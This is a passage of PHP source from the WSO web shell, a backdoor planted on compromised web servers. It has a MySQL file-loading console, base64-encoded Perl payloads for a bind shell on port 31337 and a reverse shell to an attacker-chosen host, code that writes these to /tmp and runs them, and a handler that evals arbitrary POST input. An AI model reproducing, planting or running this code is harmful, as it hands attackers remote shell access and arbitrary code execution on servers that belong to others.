1920 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1921 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1922 echo htmlspecialchars($_POST['p2']);
1923 echo "</textarea><br/><input type=submit value='Execute'>";
1924 echo "</td></tr>";
1925 }
1926 echo "</table></form><br/>";
1927 if($_POST['type']=='mysql') {
1928 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1929 if($db->fetch())
1930 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1931 }
1932 if(@$_POST['p1'] == 'loadfile') {
1933 $file = $db->loadFile($_POST['p2']);
1934 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1935 }
1936 } else {
1937 echo htmlspecialchars($db->error());
1938 }
1939 echo '</div>';
1940 wsoFooter();
1941}
1942function actionNetwork() {
1943 wsoHeader();
1944 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1945 echo "<h1>Network tools</h1><div class=content>
1946
1947 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
1948 <span>Bind port to /bin/sh [perl]</span><br/>
1949 Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1950 </form>
1951 <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
1952 <span>Back-connect [perl]</span><br/>
1953 Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1954
1955 </form><br>";
1956 if(isset($_POST['p1'])) {
1957 function cf($f,$t) {
1958 $w = @fopen($f,"w") or @function_exists('file_put_contents');
1959 if($w){
1960 @fwrite($w,@base64_decode($t));
1961 @fclose($w);
1962 }
1963 }
1964 if($_POST['p1'] == 'bpp') {
1965 cf("/tmp/bp.pl",$bind_port_p);
1966 $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
1967 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
1968 unlink("/tmp/bp.pl");
1969 }
1970 if($_POST['p1'] == 'bcp') {
1971 cf("/tmp/bc.pl",$back_connect_p);
1972 $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1973 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
1974 unlink("/tmp/bc.pl");
1975 }
1976 }
1977 echo '</div>';
1978 wsoFooter();
1979}
1980function actionRC() {
1981 if(!@$_POST['p1']) {
1982 $a = array(
1983 "uname" => php_uname(),
1984 "php_version" => phpversion(),
1985 "wso_version" => WSO_VERSION,
1986 "safemode" => @ini_get('safe_mode')
1987 );
1988 echo serialize($a);
1989 } else {
1990 eval($_POST['p1']);
1991 }
1992}
1993if( empty($_POST['a']) )
1994 if(isset($default_action) && function_exists('action' . $default_action))
1995 $_POST['a'] = $default_action;
1996 else
1997 $_POST['a'] = 'SecInfo';
1998if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1999 call_user_func('action' . $_POST['a']);
2000function FetchURL($url) {
2001 $ch = curl_init();
2002 curl_setopt($ch, CURLOPT_USERAGENT, "$cheader");
2003 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2004 curl_setopt($ch, CURLOPT_HEADER, false);
2005 curl_setopt($ch, CURLOPT_URL, $url);
2006 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2007 curl_setopt($ch, CURLOPT_TIMEOUT, 30);
2008 $data = curl_exec($ch);
2009 if(!$data) {
2010 return false;
2011 }
2012 return $data;
2013 }
2014exit;
2015?>